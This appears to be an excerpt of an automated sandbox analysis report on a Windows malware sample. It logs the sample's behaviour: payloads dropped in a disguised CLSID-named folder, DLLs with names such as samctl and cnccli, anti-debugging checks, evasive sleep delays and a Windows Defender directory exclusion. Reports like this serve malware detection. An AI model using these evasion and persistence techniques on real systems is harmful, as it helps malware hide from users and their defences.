Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,

24_2_00007FFDA55A7694

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDA5576078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDA55AB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDA55D2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDA5BA3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDAC0F4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	24_2_00007FFDAC121D98

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5714	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4113	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6137	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3594	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7537	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1915	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\nVYOsq5a	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\459WBsWA	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\o1i2PUnI	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\LL369bff	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\OKh5fbg5	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\SCKoP3sQ	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\ZNdEbgqy	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\CheAuE4k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\m28TQ56q	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_24-63363

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-11113

Source: C:\Users\user\Desktop\file.exe TID: 2836	Thread sleep time: -33840000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2836	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732	Thread sleep count: 5714 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4160	Thread sleep count: 4113 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3508	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796	Thread sleep count: 6137 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196	Thread sleep count: 3594 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704	Thread sleep count: 7537 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2444	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704	Thread sleep count: 1915 > 30	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1476	Thread sleep count: 53 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6112	Thread sleep count: 50 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6196	Thread sleep count: 52 > 30

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: 6_2_00007FF66EBA3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	6_2_00007FF66EBA3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FF70CAD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FF70CAD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA557A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA557A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55A1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA55A1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55D5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA55D5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BA57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA5BA57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC0F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDAC0F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDAC122FE3

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: main.exe, 00000018.00000003.2332385927.0000021B15AC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 5
Source: file.exe, 00000001.00000002.3365612779.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383380591.000001C9F4B68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874139711.0000021B15AC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266264150.000002204C289000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

API call chain: ExitProcess graph end node

graph_24-60417

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBAFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

6_2_00007FF66EBAFF1F

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA97F2 GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,strncpy,strncpy,strncpy,

6_2_00007FF66EBA97F2

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: 6_2_00007FF66EBA1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,		6_2_00007FF66EBA1131
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FF70CAD1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,		24_2_00007FF70CAD1131

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

